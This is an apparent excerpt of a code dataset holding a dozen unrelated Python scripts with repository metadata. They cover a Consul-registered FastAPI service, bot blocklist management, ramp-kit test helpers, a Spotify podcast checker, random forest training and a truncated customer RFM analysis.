(ar)\n\n","sub_path":"Rio.py","file_name":"Rio.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"222702400","text":"import configparser\n\nimport netifaces\nimport requests\nfrom consul import Consul, Check\nfrom fastapi import FastAPI\nfrom lorem.text import TextLorem\n\n\nconsul_port = 8500\nservice_name = \"service1\"\nservice_port = 8010\n\n\ndef get_ip():\n config_parser = configparser.ConfigParser()\n config_file = \"config.ini\"\n config_parser.read(config_file)\n interface_name = 
config_parser['NETWORK']['interface']\n ip = netifaces.ifaddresses(interface_name)[netifaces.AF_INET][0][\"addr\"]\n return ip\n\n\ndef register_to_consul():\n consul = Consul(host=\"consul\", port=consul_port)\n\n agent = consul.agent\n\n service = agent.service\n\n ip = get_ip()\n\n check = Check.http(f\"http://{ip}:{service_port}/\", interval=\"10s\", timeout=\"5s\", deregister=\"1s\")\n\n service.register(service_name, service_id=service_name, address=ip, port=service_port, check=check)\n\n\ndef get_service(service_id):\n consul = Consul(host=\"consul\", port=consul_port)\n\n agent = consul.agent\n\n service_list = agent.services()\n\n service_info = service_list[service_id]\n\n return service_info['Address'], service_info['Port']\n\n\napp = FastAPI()\n\nregister_to_consul()\n\n\n@app.get(\"/\")\ndef index():\n return \"Service1\"\n\n\n@app.get(\"/sentence-dependent\")\ndef get_sentence_using_service_2():\n address, port = get_service(\"service2\")\n\n words = requests.get(f\"http://{address}:{port}/words\").json()\n\n words = words[\"words\"]\n\n lorem = TextLorem(words=words)\n\n return {\"sentence\": lorem.sentence()}\n\n\n@app.get(\"/sentence-independent\")\ndef get_sentence_using_own_words():\n lorem = TextLorem()\n\n return {\"sentence\": lorem.sentence()}\n","sub_path":"src/service1/service1.py","file_name":"service1.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"239242416","text":"from pathlib import Path\nimport ujson as json\nfrom datetime import datetime, timedelta\nfrom typing import Union\ntry:\n from src.common import logger\nexcept ImportError:\n from loguru import logger\n\n\nblock_groups_file = Path(__file__).parent/\"block_groups.json\"\nblock_users_file = Path(__file__).parent/\"block_users.json\"\n\n\n# block_groups = {} # 忽略群名单\n# block_users = {} # 忽略用户名单\n\n\nif not block_groups_file.exists():\n with block_groups_file.open('w', encoding='utf-8') as j:\n json.dump({}, j, indent=4)\n\nif not block_users_file.exists():\n with block_users_file.open('w', encoding='utf-8') as j:\n json.dump({}, j, indent=4)\n\n\n# with block_groups_file.open(encoding='utf-8') as j:\n# block_groups = json.load(j)\n# with block_users_file.open(encoding='utf-8') as j:\n# block_users = json.load(j)\n\n\nclass Blocker:\n '''\n 控制群与用户的阻塞列表的基类\n 群与用户阻塞规则reason:\n 0: 通用规则,违规封禁���暂不加入解封方式(实际上暂时没有针对群的违规理由,只有针对个人)\n 1:用户规则,用户主动加入阻塞名单,暂不加入解封方式\n 2:用户规则,临时阻塞,6小时限制\n 3: 群规则,由管理员使用off指令禁用,查询时仍然返回false,使用on指令主动解除\n '''\n block_list = {} # 阻塞列表,群与用户的子类会使用不同的列表\n\n def __init__(self, id: int) -> None:\n self.id = str(id)\n self.file = Path() # 文件,用于子类的记录文件\n\n def check_block(self) -> bool:\n '''\n 检测是否为阻塞id,True为非阻塞\n '''\n block_ls = self.__class__.block_list\n # reason为2根据时间解禁,其他返回false,未禁止返回true\n if self.id in block_ls:\n if block_ls[self.id]['reason'] != 2:\n return False\n else:\n add_time = datetime.strptime(block_ls[self.id]['add_time'], \"%Y-%m-%d %H:%M:%S\")\n if datetime.now() - add_time < timedelta(hours=2):\n return False\n else:\n self.rm_block()\n return True\n else:\n return True\n\n def add_block(self, reason: int):\n '''\n 群与用户阻塞规则reason:\n 0: 通用规则,违规封禁,暂不加入解封方式(实际上暂时没有针对群的违规理由,只有针对个人)\n 1:用户规则,用户主动加入阻塞名单,暂不加入解封方式\n 2:用户规则,临时阻塞,2小时限制\n 3: 群规则,由管理员使用off指令禁用,查询时仍然返回false,使用on指令主动解除\n 可能会根据原因加入解封规则\n '''\n add_time = datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n data = {\n 'reason': reason,\n 'add_time': add_time\n }\n self.__class__.block_list[self.id] = data\n with 
self.file.open('w', encoding='utf-8') as j:\n json.dump(self.__class__.block_list, j, indent=4)\n\n def rm_block(self):\n '''\n 移出阻塞列表\n '''\n block_ls = self.__class__.block_list\n del block_ls[self.id]\n with self.file.open('w', encoding='utf-8') as j:\n json.dump(self.__class__.block_list, j, indent=4)\n\n \nclass Group_Blocker(Blocker):\n '''\n 管理阻塞群组的类 ※gid会被转化为str,查询时要注意\n '''\n with block_groups_file.open(encoding='utf-8') as j:\n block_list = json.load(j)\n\n def __init__(self, gid: int) -> None:\n self.id = str(gid)\n self.file = block_groups_file\n\n def turn_on(self) -> bool:\n '''\n 当reason为3时可调用此解禁方式,解禁同时返回true\n 当reason不为3时不予解禁并且返回false\n '''\n if self.__class__.block_list[self.id]['reason'] == 3:\n self.rm_block()\n logger.info(f'Remove group {self.id} from block list')\n return True\n else:\n logger.info(f'Failed to unblock group {self.id} , reason: {self.__class__.block_list[self.id][\"reason\"]}')\n return False\n\n\nclass User_Blocker(Blocker):\n '''\n 管理阻塞用户的类 ※uid会被转化为str,查询时要注意\n '''\n with block_users_file.open(encoding='utf-8') as j:\n block_list = json.load(j)\n\n def __init__(self, uid: int) -> None:\n self.id = str(uid)\n self.file = block_users_file\n\n\n#——————白名单群组——————\n\n\nenable_groups_file = Path(__file__).parent/\"enable_groups.json\"\n\n\nif not enable_groups_file.exists():\n with enable_groups_file.open('w', encoding='utf-8') as j:\n json.dump({}, j, indent=4)\n\n\nclass Enable_Group:\n \"\"\"白名单群组,用作授权管理,也防止被拉入陌生群\"\"\"\n\n with enable_groups_file.open(encoding='utf-8') as j:\n enable_groups : dict = json.load(j)\n\n def __init__(self, gid: Union[int, str]) -> None:\n self.gid = str(gid)\n\n def check_enable(self, *, check_date: bool=False) -> bool:\n \"\"\"检查是白名单群,普通情况下不会检查过期时间\n\n Args:\n check_date (bool, optional): 使用此参数检查是否授权已到期. 
Defaults to False.\n\n Returns:\n bool: 通过结果\n \"\"\"\n\n if not check_date:\n if self.gid in self.__class__.enable_groups:\n return True\n else:\n return False\n else:\n # TODO: 检查到期时间\n pass\n \n def approve(self, term: int):\n \"\"\"授权群使用本bot\n\n Args:\n term (int): 授权天数\n\n Returns:\n bool: 授权是否成功,如果已经在授权名单中则返回False\n \"\"\"\n if self.gid in self.__class__.enable_groups:\n logger.warning(f'Group {self.gid} has approved')\n return False\n else:\n data = {\n 'authorize_time': datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n 'lease_term': term\n }\n self.__class__.enable_groups[self.gid] = data\n with enable_groups_file.open('w', encoding='utf-8') as j:\n json.dump(self.__class__.enable_groups, j, indent=4)\n logger.info(f'Approve group {self.gid} with {term} days')\n return True\n\n def renewal(self, term: int):\n \"\"\"续期许可证,如果还未开通则会运行授权函数\n\n Args:\n term (int): 续期天数\n \"\"\"\n if self.gid not in self.__class__.enable_groups:\n logger.warning(f'Group {self.gid} never approved, will run aprroving program')\n self.approve(term)\n else:\n self.__class__.enable_groups[self.gid]['lease_term'] += term\n with enable_groups_file.open('w', encoding='utf-8') as j:\n json.dump(self.__class__.enable_groups, j, indent=4)\n logger.info(f'Renew group {self.gid} with {term} days')\n\n\nif __name__ == \"__main__\":\n blocker1 = User_Blocker(112)\n blocker1.rm_block()\n print(blocker1.check_block())","sub_path":"src/common/verify.py","file_name":"verify.py","file_ext":"py","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"356362838","text":"# coding: utf-8\n\n\"\"\"Provide utils to test ramp-kits.\"\"\"\nfrom __future__ import print_function\n\nimport os\nfrom subprocess import call\nimport imp\nfrom os.path import join, abspath\n\nimport numpy as np\nimport cloudpickle as pickle\n\n\ndef _delete_line_from_file(f_name, line_to_delete):\n with open(f_name, \"r+\") as f:\n lines = f.readlines()\n f.seek(0)\n for line in lines:\n if line != line_to_delete:\n f.write(line)\n f.truncate()\n\n\ndef execute_notebook(ramp_kit_dir='.'):\n problem_name = abspath(ramp_kit_dir).split('/')[-1]\n print('Testing if the notebook can be executed')\n call(\n 'jupyter nbconvert --execute {}/{}_starting_kit.ipynb '.format(\n ramp_kit_dir, problem_name) +\n '--ExecutePreprocessor.kernel_name=$IPYTHON_KERNEL ' +\n '--ExecutePreprocessor.timeout=600', shell=True)\n\n\ndef convert_notebook(ramp_kit_dir='.'):\n problem_name = abspath(ramp_kit_dir).split('/')[-1]\n print('Testing if the notebook can be converted to html')\n call('jupyter nbconvert --to html {}/{}_starting_kit.ipynb'.format(\n ramp_kit_dir, problem_name), shell=True)\n _delete_line_from_file(\n '{}/{}_starting_kit.html'.format(ramp_kit_dir, problem_name),\n '\\n')\n\n\ndef assert_notebook(ramp_kit_dir='.'):\n print('----------------------------')\n convert_notebook(ramp_kit_dir)\n execute_notebook(ramp_kit_dir)\n\n\ndef assert_read_problem(ramp_kit_dir='.'):\n problem = imp.load_source('', join(ramp_kit_dir, 'problem.py'))\n return problem\n\n\ndef assert_title(ramp_kit_dir='.'):\n problem = assert_read_problem(ramp_kit_dir)\n print('Testing {}'.format(problem.problem_title))\n\n\ndef assert_data(ramp_kit_dir='.', ramp_data_dir='.'):\n problem = assert_read_problem(ramp_kit_dir)\n print('Reading train and test files from {}/data ...'.format(\n ramp_data_dir))\n X_train, y_train = problem.get_train_data(path=ramp_data_dir)\n X_test, y_test = problem.get_test_data(path=ramp_data_dir)\n 
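# hand the freshly loaded arrays straight back; assert_submission slices X_train further with the cv folds\n    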
return X_train, y_train, X_test, y_test\n\n\ndef assert_cv(ramp_kit_dir='.', ramp_data_dir='.'):\n problem = assert_read_problem(ramp_kit_dir)\n X_train, y_train = problem.get_train_data(path=ramp_data_dir)\n print('Reading cv ...')\n cv = list(problem.get_cv(X_train, y_train))\n return cv\n\n\ndef assert_score_types(ramp_kit_dir='.'):\n problem = assert_read_problem(ramp_kit_dir)\n score_types = problem.score_types\n return score_types\n\n\ndef assert_submission(ramp_kit_dir='.', ramp_data_dir='.',\n submission='starting_kit'):\n \"\"\"Helper to test a submission from a ramp-kit.\n\n Parameters\n ----------\n ramp_kit_dir : str, (default='.')\n The directory of the ramp-kit to be tested for submission.\n\n ramp_data_dir : str, (default='.')\n The directory of the data\n\n submission_name : str, (default='starting_kit')\n The name of the submission to be tested.\n\n Returns\n -------\n None\n\n \"\"\"\n problem = assert_read_problem(ramp_kit_dir)\n assert_title(ramp_kit_dir)\n X_train, y_train, X_test, y_test = assert_data(ramp_kit_dir, ramp_data_dir)\n cv = assert_cv(ramp_kit_dir, ramp_data_dir)\n score_types = assert_score_types(ramp_kit_dir)\n print('Training {}/submissions/{} ...'.format(\n ramp_kit_dir, submission))\n module_path = join(ramp_kit_dir, 'submissions', submission)\n train_train_scoress = np.empty((len(cv), len(score_types)))\n train_valid_scoress = np.empty((len(cv), len(score_types)))\n test_scoress = np.empty((len(cv), len(score_types)))\n for fold_i, (train_is, valid_is) in enumerate(cv):\n trained_workflow = problem.workflow.train_submission(\n module_path, X_train, y_train, train_is=train_is)\n\n # try:\n # model_file = join(module_path, 'model.pkl')\n # # Mehdi's hack to get the trained_workflow (which includes\n # # imported files using imp.load_source) pickled\n # trained_workflow.__class__.__module__ = '__main__'\n # with open(model_file, 'wb') as pickle_file:\n # pickle.dump(trained_workflow, pickle_file)\n # with open(model_file, 'r') as pickle_file:\n # trained_workflow = pickle.load(pickle_file)\n # os.remove(model_file)\n # except Exception as e:\n # print(\"Warning: model can't be pickled.\")\n # print(e)\n\n y_pred_train = problem.workflow.test_submission(\n trained_workflow, X_train)\n predictions_train_train = problem.Predictions(\n y_pred=y_pred_train[train_is])\n ground_truth_train_train = problem.Predictions(\n y_true=y_train[train_is])\n predictions_train_valid = problem.Predictions(\n y_pred=y_pred_train[valid_is])\n ground_truth_train_valid = problem.Predictions(\n y_true=y_train[valid_is])\n\n y_pred_test = problem.workflow.test_submission(\n trained_workflow, X_test)\n predictions_test = problem.Predictions(y_pred=y_pred_test)\n ground_truth_test = problem.Predictions(y_true=y_test)\n\n print('CV fold {}'.format(fold_i))\n for score_type_i, score_type in enumerate(score_types):\n score = score_type.score_function(\n ground_truth_train_train, predictions_train_train)\n train_train_scoress[fold_i, score_type_i] = score\n print('\\ttrain {} = {}'.format(\n score_type.name, round(score, score_type.precision)))\n\n score = score_type.score_function(\n ground_truth_train_valid, predictions_train_valid)\n train_valid_scoress[fold_i, score_type_i] = score\n print('\\tvalid {} = {}'.format(\n score_type.name, round(score, score_type.precision)))\n\n score = score_type.score_function(\n ground_truth_test, predictions_test)\n test_scoress[fold_i, score_type_i] = score\n print('\\ttest {} = {}'.format(\n score_type.name, round(score, 
score_type.precision)))\n\n print('----------------------------')\n means = train_train_scoress.mean(axis=0)\n stds = train_train_scoress.std(axis=0)\n for mean, std, score_type in zip(means, stds, score_types):\n print('train {} = {} ± {}'.format(\n score_type.name, round(mean, score_type.precision),\n round(std, score_type.precision + 1)))\n\n means = train_valid_scoress.mean(axis=0)\n stds = train_valid_scoress.std(axis=0)\n for mean, std, score_type in zip(means, stds, score_types):\n print('valid {} = {} ± {}'.format(\n score_type.name, round(mean, score_type.precision),\n round(std, score_type.precision + 1)))\n\n means = test_scoress.mean(axis=0)\n stds = test_scoress.std(axis=0)\n for mean, std, score_type in zip(means, stds, score_types):\n print('test {} = {} ± {}'.format(\n score_type.name, round(mean, score_type.precision),\n round(std, score_type.precision + 1)))\n","sub_path":"rampwf/utils/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":7089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"295347579","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 24 14:24:25 2018\n\n@author: dav\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mticker\nimport cartopy.crs as ccrs\n\nfrom cartopy.mpl.gridliner import lon_formatter, lat_formatter\n\n\nax = plt.axes(projection=ccrs.Mercator())\nax.coastlines()\n\ngl = ax.gridlines(crs=ccrs.PlateCarree(), draw_labels=True,\n linewidth=2, color='gray', alpha=0.5, linestyle='--')\ngl.xlabels_top = False\ngl.ylabels_left = False\ngl.xlines = False\ngl.xlocator = mticker.FixedLocator([-180, -45, 0, 45, 180])\ngl.xformatter = lon_formatter(\"DMS\")\ngl.yformatter = lat_formatter(\"DMS\")\ngl.xlabel_style = {'size': 15, 'color': 'gray'}\ngl.xlabel_style = {'color': 'red', 'weight': 'bold'}\n\nplt.show()\n\n","sub_path":"latlon_2.py","file_name":"latlon_2.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"508731511","text":"# app/weather_service.py\nimport os\nfrom dotenv import load_dotenv\nimport spotipy\nimport sys\nfrom spotipy.oauth2 import SpotifyClientCredentials\nimport spotipy.util as util\nload_dotenv()\nimport requests\nimport datetime\nimport datetime\n\n# Date \n\ny = datetime.datetime.now()\ndate_today = str(y.strftime(\"%Y-%m-%d\"))\ntoday = datetime.date.today()\nyesterday = str(today - datetime.timedelta(days=1))\n\nprint(yesterday)\nprint(date_today)\n\n\n\nSPOTIPY_CLIENT_ID = os.getenv(\"SPOTIPY_CLIENT_ID\")\nSPOTIPY_CLIENT_SECRET = os.getenv(\"SPOTIPY_CLIENT_SECRET\")\nSPOTIPY_REDIRECT_URI = os.getenv(\"SPOTIPY_REDIRECT_URI\")\nusername = os.getenv(\"username\")\n\nscope = 'user-library-read playlist-modify-public'\n\nutil.prompt_for_user_token(username,\n scope,\n SPOTIPY_CLIENT_ID,\n SPOTIPY_CLIENT_SECRET,\n SPOTIPY_REDIRECT_URI)\n\ntoken = util.prompt_for_user_token(username, scope)\n\n\nif token:\n sp = spotipy.Spotify(auth=token)\n results = sp.current_user_saved_shows()\n items = results[\"items\"]\n #print(items)\nelse:\n print(\"Can't get token for\", username)\n\n#print(results)\n# 'spotify:show:5fRBo7ROBQNq8IAavbO64H'\n\n\nID_LIST = [p[\"show\"][\"id\"] for p in items]\nepisodes = []\nfor x in ID_LIST:\n sodes = sp.show(x)\n episodes.append(sodes)\n\n\n#recent_ep_uri = [ sub['uri'] for sub in recent_releases ] \n\n#Podcast Desdcription \n#for q in episodes:\n# episode_info = 
[q['description'] for q in episodes]\n# #print(episode_info)\n\n\n#Remove Show Meta Data\n\n\nshow_items = [p[\"episodes\"][\"items\"] for p in episodes]\n#Get Most Recent \nrecent_releases = [item[0] for item in show_items]\nnew_release = [b for b in recent_releases if str(b[\"release_date\"]) == yesterday or date_today]\nrecent_ep_uris = [ sub['id'] for sub in new_release] \nrecent_descriptions = [ sub['description'] for sub in recent_releases ] \nrecent_show_titles= [ sub['description'] for sub in recent_releases ] \nepisode_dates = [ sub['release_date'] for sub in recent_releases ] \nprint(recent_ep_uris)\n\n#newly_released_list = []\n#new_release = [b for b in recent_releases if str(b[\"release_date\"]) == \"2020-06-27\" or \"2020-06-27\"]\n#newly_released_list.append(new_release)\n#print(recent_releases)\n#print(new_release)\n#print(episode_dates)\n\n#print(newly_released_list)\n\n#print(*recent_descriptions, sep='\\n')\n\n#print(episodes)\n\n# Get Descriptions \n\n\n#FULL META DATA FOR NEW EPS\n\n\n\nnew_episodes = []\nfor x in recent_ep_uris:\n sodes = sp.episode(x)\n new_episodes.append(sodes)\n#print(new_episodes)\n\n\n#EPISODE TITLE and Description List \nfor q in new_episodes:\n episode_info = [q['show'][\"name\"] + \":\" + \" \" + q['name'] + \" \" + q['description'] for q in new_episodes]\n #show_titles = str([q['show'][\"name\"] for q in new_episodes])\n#print(show_titles)\n#print(*episode_info, sep = \"\\n\")\n\n\n","sub_path":"Podcast_App/podcast_check.py","file_name":"podcast_check.py","file_ext":"py","file_size_in_byte":2846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"21239157","text":"def get_alert_level(obj_package):\n \"\"\"\n determines the alert level basis the current location vs the destination\n of the given package\n if the package is at its destination, the level is L1, else, L2 \n \"\"\"\n if (obj_package.get('cn', '') in obj_package.cs.get('sl', '') and\n (obj_package.get('cn', None))):\n level = u'L1'\n else:\n level = u'L2'\n \n return level\n","sub_path":"package/alerts.py","file_name":"alerts.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"29027489","text":"# coding: utf-8\n__author__ = 'shiyue'\n\n\"\"\"\nYou are playing the following Nim Game with your friend: There is a heap of stones on the table, each time one of you\ntake turns to remove 1 to 3 stones. 
The one who removes the last stone will be the winner.\nYou will take the first turn to remove the stones.\nBoth of you are very clever and have optimal strategies for the game.\nWrite a function to determine whether you can win the game given the number of stones in the heap.\n\nFor example, if there are 4 stones in the heap, then you will never win the game: no matter 1, 2, or 3 stones\nyou remove, the last stone will always be removed by your friend.\n\nHint:\n If there are 5 stones in the heap, could you figure out a way to remove the stones such that\n you will always be the winner?\n\"\"\"\nimport random\n\n\nclass Solution(object):\n def canWinNim(self, n):\n \"\"\"\n :type n: int\n :rtype: bool\n \"\"\"\n if n % 4 == 0:\n return False\n else:\n return True\n\n def simulateWin(self, n):\n \"\"\"\n If n % 4 == 0, there is no way to win.\n But else, the win strategy is each time left m stones, m % 4 == 0.\n :param n: the num of stones\n :return: a possible solution to win.\n \"\"\"\n solution_of_a = []\n solution_of_b = []\n while n > 0:\n ma = n % 4\n solution_of_a.append(ma)\n n -= ma\n if n == 0:\n break\n mb = random.choice([1, 2, 3])\n solution_of_b.append(mb)\n n -= mb\n return solution_of_a, solution_of_b\n\n\nif __name__ == '__main__':\n print(Solution().simulateWin(10))\n","sub_path":"easy/NimGame.py","file_name":"NimGame.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"10272911","text":"# coding=utf-8\nimport requests\nimport json\nimport configparser\nimport logging\n\nparser = configparser.ConfigParser()\nparser.read(\"plugins/config.ini\")\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\n\n\nclass POST:\n def __init__(self, **kwargs):\n self.client = kwargs.get(\"client\")\n\n async def on_server_join(self, server):\n amount = len(self.client.servers)\n token = parser.get(\"bots.discord.pw\", \"token\")\n\n self.upload(amount, token)\n log.info(\"Updated guild count: {} (joined {})\".format(amount, server.name))\n\n @staticmethod\n def upload(num, token):\n url = \"https://bots.discord.pw/api/bots/:user_id/stats/\".replace(\":user_id\", \"171633949532094464\")\n payload = {\"server_count\": num}\n head = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": str(token)\n }\n\n requests.post(url, data=json.dumps(payload), headers=head)\n return True\n\n\nclass NanoPlugin:\n _name = \"POST module for bots.discord.pw\"\n _version = 0.1\n\n handler = POST\n events = {\n \"on_server_join\": 9\n }\n","sub_path":"plugins/POSTServerCount.py","file_name":"POSTServerCount.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"163229292","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\nfrom sklearn.ensemble import RandomForestClassifier\nfrom models.data_loader import DataLoader\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import classification_report, confusion_matrix\nimport time\n\n\nif __name__ == '__main__':\n start_time = time.time()\n # We learned from `exploring_data.ipynb` that PCA with 8 principal components is optimal.\n n_components = 8\n train_prop = 0.8\n\n # Random state to allow for this to be deterministic.\n random_state = np.random.RandomState(42069)\n\n # Build the model pipeline\n 
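# standardize, project onto the 8 PCA components chosen in exploring_data.ipynb, then fit the forest\n    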
print(\"Creating the model pipeline...\")\n model_pipeline = Pipeline(steps=[\n ('standardization', StandardScaler()),\n ('pca', PCA(n_components=n_components, random_state=random_state)),\n ('classifier', RandomForestClassifier(random_state=random_state))\n ])\n\n print(\"Loading the data...\")\n dl = DataLoader('data/winequality-red.csv', random_state=random_state)\n # 20% test, 72% train, 8% validate\n X_train, X_test, y_train, y_test = dl.train_test_split(test_prop=(1.0-train_prop))\n\n N_train, _ = X_train.shape\n d = n_components\n\n parameter_grid = {\n 'classifier__n_estimators': np.linspace(50, 500, 10, dtype=int),\n 'classifier__max_depth': np.append(np.linspace(d**2, d*(d+3), 9), None),\n 'classifier__criterion': ['entropy', 'gini'],\n 'classifier__class_weight': ['balanced_subsample', 'balanced'],\n 'classifier__max_features': [2, 3, 4, 'sqrt'],\n }\n\n # 5-fold validation.\n print(\"Defining the grid search...\")\n grid_search = GridSearchCV(model_pipeline, param_grid=parameter_grid, scoring='f1_weighted', n_jobs=-2, cv=5)\n\n # Train the model\n print(\"Training the model...\")\n grid_search.fit(X_train, y_train)\n\n print(\"Printing results...\")\n print(f\"Time taken to run the program: {time.time() - start_time}\")\n\n print(\"Best Estimator:\")\n print(\"Parameters: \" + str(grid_search.best_params_))\n print(\"Accuracy: \" + str(grid_search.best_score_))\n\n y_test_pred = grid_search.predict(X_test)\n print(\"Classification report (Test):\")\n print(classification_report(y_test, y_test_pred))\n\n unique_labels = np.unique(y_test)\n\n confusion_mtrx = pd.DataFrame(\n confusion_matrix(y_test, y_test_pred, labels=unique_labels),\n index=[f'true:{i}' for i in unique_labels],\n columns=[f'pred:{i}' for i in unique_labels]\n )\n\n print(confusion_mtrx)","sub_path":"training_RFC.py","file_name":"training_RFC.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"526506675","text":"\"\"\"Summarize for MLRA, somehow\"\"\"\nfrom __future__ import print_function\nimport sys\n\nfrom pandas.io.sql import read_sql\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nfrom pyiem.util import get_dbconn\n\nLABELS = {\n 36: 'Slopes > 3% to Switchgrass',\n 37: 'Slopes > 6% to Switchgrass',\n 38: 'Slopes > 10% to Switchgrass',\n }\n\n\ndef main(argv):\n \"\"\"Go Main Go\"\"\"\n mlra_id = int(argv[1])\n pgconn = get_dbconn('idep')\n\n mlraxref = read_sql(\"\"\"\n with m as (\n select mlra_id, mlra_name, sum(st_area(geography(geom))) from mlra\n WHERE mlra_id = %s GROUP by mlra_id, mlra_name),\n h as (\n select mlra_id, sum(st_area(geography(st_transform(geom, 4326))))\n from huc12 WHERE scenario = 0 and mlra_id = %s GROUP by mlra_id\n )\n SELECT m.mlra_id, m.mlra_name, h.sum / m.sum * 100. as coverage\n from m JOIN h on (m.mlra_id = h.mlra_id)\n \"\"\", pgconn, params=(mlra_id, mlra_id), index_col='mlra_id')\n\n df = read_sql(\"\"\"\n with myhucs as (\n SELECT huc_12 from huc12 where scenario = 0 and mlra_id = %s\n )\n select r.huc_12, scenario, extract(year from valid)::int as year,\n sum(avg_loss) * 10. as loss, sum(avg_runoff) as runoff,\n sum(avg_delivery) * 10. 
as delivery\n from results_by_huc12 r JOIN myhucs h on (r.huc_12 = h.huc_12)\n where r.valid >= '2008-01-01' and r.valid < '2017-01-01'\n and scenario in (0, 36, 37, 38)\n GROUP by r.huc_12, year, scenario\n \"\"\", pgconn, params=(mlra_id, ), index_col=None)\n gdf = df.groupby('scenario').mean()\n print(\"%s\\t%.1f\\t%.2f\" % (mlraxref.at[mlra_id, 'mlra_name'],\n mlraxref.at[mlra_id, 'coverage'],\n gdf.at[0, 'delivery']), end='\\t')\n for scenario in range(36, 39):\n delta = gdf.loc[(scenario, )] / gdf.loc[(0, )] * 100.\n print(\"%.2f (%.1f%%)\" % (gdf.at[scenario, 'delivery'], delta['delivery']),\n end='\\t')\n print()\n\n\nif __name__ == '__main__':\n for mlraid in [106, 107, 108, 109, 121, 137, 150, 155, 166, 175,\n 176, 177, 178, 179, 181, 182, 186, 187, 188, 196,\n 197, 204, 205]:\n main([None, mlraid])\n","sub_path":"scripts/switchgrass/mlra_summary_text.py","file_name":"mlra_summary_text.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"343567977","text":"import numpy as np\n\n\ndef shuffle(data, inplace=False):\n n_x = data.xs.shape[1]\n xs_ys = np.hstack((data.xs, data.ys))\n np.random.shuffle(xs_ys)\n xs = xs_ys[:, :n_x]\n ys = xs_ys[:, n_x:]\n if inplace:\n data.xs, data.ys = xs, ys\n else:\n shuffled_data = data.copy()\n shuffled_data.xs, shuffled_data.ys = xs, ys\n return shuffled_data","sub_path":"tfnn/datasets/shuffle.py","file_name":"shuffle.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"256955514","text":"\"\"\"\n Capstone Project. Code written by Nicolas Bohner.\n Fall term, 2018-2019.\n\"\"\"\n\nimport rosebotics as rb\nimport time\n# Rosebotics: forward fo n seconds\n# Write test code for spin_function\n# ls -- list\n# cd -- change dir\n# python RUN\n\ndef main():\n \"\"\" Runs tests. \"\"\"\n run_tests()\n\n\ndef run_tests():\n \"\"\" Runs various tests. \"\"\"\n# run_test_go_stop()\n test_spin(5)\n test_spin(3)\n\ndef test_spin(n):\n robot.spin('clockwise', n)\n robot.sleep(1)\n robot.spin('counter-clockwise', n)\n\n\ndef run_test_go_stop():\n \"\"\" Tests the go and stop Snatch3rRobot methods. 
\"\"\"\n robot = rb.Snatch3rRobot()\n\n robot.go(50, 25)\n time.sleep(2)\n robot.stop()\n\n print(robot.right_wheel.get_degrees_spun())\n print(robot.left_wheel.get_degrees_spun())\n robot.left_wheel.reset_degrees_spun(0)\n\n\n time.sleep(2)\n\n robot.go(100, 100)\n time.sleep(3)\n robot.stop(rb.StopAction.COAST.value)\n\n print(robot.right_wheel.get_degrees_spun())\n print(robot.left_wheel.get_degrees_spun())\n\n\nmain()\n","sub_path":"src/DarkNic.py","file_name":"DarkNic.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"157589567","text":"import pymysql\r\nimport config\r\nimport numpy as np\r\nimport pandas as pd\r\nimport datetime as dt\r\nfrom Misc.foodfie_db.db import connectDB\r\n\r\nSQL = 'Select * from foodfie.Order'\r\ndb_connect = pymysql.connect(host = config.host, port=config.port, user= config.user, password = config.password, db= config.db)\r\n\r\nNOW = dt.datetime.now()\r\ndf1 = pd.read_sql(SQL, db_connect)\r\nrfmTable = df1.groupby('CustomerId').agg({'TotalAmount': np.sum, 'OrderTime': lambda x: (NOW - x.max()).days, 'CustomerId':np.count_nonzero})\r\nrfmTable.rename(columns={'OrderTime':'LastVisited',\r\n 'CustomerId': 'TotalVisit',\r\n }, inplace = True)\r\n#rfmTable.columns = ['LastVisited', 'Frequency','TotalAmount']\r\nprint(rfmTable.head())\r\nquantiles = rfmTable.quantile(q=[0.25, 0.5, 0.75])\r\nquantiles = quantiles.to_dict()\r\n\r\nsegmented_rfm = rfmTable\r\n\r\ndef RScore(x,p,d):\r\n if x <= d[p][0.25]:\r\n return 1\r\n elif x <= d[p][0.50]:\r\n return 2\r\n elif x <= d[p][0.75]:\r\n return 3\r\n else:\r\n return 4\r\n\r\ndef FMScore(x,p,d):\r\n if x <= 